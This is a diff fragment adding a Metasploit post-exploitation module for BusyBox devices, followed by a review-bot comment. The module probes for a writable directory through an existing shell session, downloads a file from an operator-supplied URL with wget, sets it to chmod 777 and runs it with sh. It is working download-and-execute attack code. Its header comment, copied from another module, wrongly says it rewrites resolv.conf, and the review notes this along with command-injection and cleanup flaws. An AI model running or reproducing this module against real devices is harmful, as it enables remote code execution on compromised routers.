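+a file to the router or device executing BusyBox and then
+it executes the download file.',
+'Author' => 'Javier Vicente Vallejo',
+'License' => MSF_LICENSE,
+'References' =>
+[
+[ 'URL', 'http://vallejo.cc']
+],
+'Platform' => ['linux'],
+'SessionTypes' => ['shell']
+)
+
+register_options(
+[
+OptString.new('URL', [true, 'Full URL of file to download.'])
+], self.class)
+
+end
+
+#The module tries to update resolv.conf file with the SRVHOST dns address. It tries to update
+#udhcpd.conf too, with SRVHOST dns address, that should be given to network's hosts via dhcp
+
+def run
+vprint_status("Trying to find writable directory.")
+writable_directory = nil
+writable_directory = "/etc/" if is_writable_directory("/etc")
+writable_directory = "/mnt/" if (!writable_directory && is_writable_directory("/mnt"))
+writable_directory = "/var/" if (!writable_directory && is_writable_directory("/var"))
+writable_directory = "/var/tmp/" if (!writable_directory && is_writable_directory("/var/tmp"))
+if writable_directory
+vprint_status("writable directory found, downloading file.")
+rand_str = ""; 16.times{rand_str << (65 + rand(25)).chr}
+random_file_path = writable_directory + rand_str
+cmd_exec("wget -O #{random_file_path} #{datastore['URL']}"); Rex::sleep(0.1)
+if file_exists(random_file_path)
+print_good("File downloaded using wget. Executing it.")
+cmd_exec("chmod 777 #{random_file_path}"); Rex::sleep(0.1)
+vprint_status(cmd_exec("sh #{random_file_path}"))
+else
+print_error("Unable to download file.")
+end
+else
+print_error("Writable directory not found.")
+end
+end
+
+#This function checks if the target directory is writable
+
+def is_writable_directory(directory_path)
+retval = false
+rand_str = ""; 16.times{rand_str << (65 + rand(25)).chr}
+file_path = directory_path + "/" + rand_str
+session.shell_write("echo #{rand_str}XXX#{rand_str} > #{file_path}\n"); Rex::sleep(0.1)
+(1..5).each{session.shell_read(); Rex::sleep(0.1)}
+rcv = read_file(file_path)
+vprint_status("is_writable_directory:"+rcv)
+if rcv.include? (rand_str+"XXX"+rand_str)
+retval = true
+end
+cmd_exec("rm -f #{file_path}"); Rex::sleep(0.1)
+return retval
+end
+
+#file? doesnt work because test -f is not implemented in busybox
+def file_exists(file_path)
+s = read_file(file_path)
+if s and s.length
+return true
+end
+return false
+end
+
+end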
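Review bot: The comment above `run` was copied from busybox_setdns.rb and describes updating resolv.conf and udhcpd.conf, which this module does not do; it should read `# Finds a writable directory, downloads URL there with wget and runs the file with sh.`. `datastore['URL']` is an `OptString` interpolated unquoted into the `wget` command line, so a URL containing `&` or `;` is split by the remote shell and the command that runs is not the one the operator entered. `chmod 777` is wider than `sh #{random_file_path}` needs, since sh only has to read the file, and the download is never removed. The file therefore stays world-writable on the device after the run; `cmd_exec("rm -f #{random_file_path}")` once execution returns would clean it up.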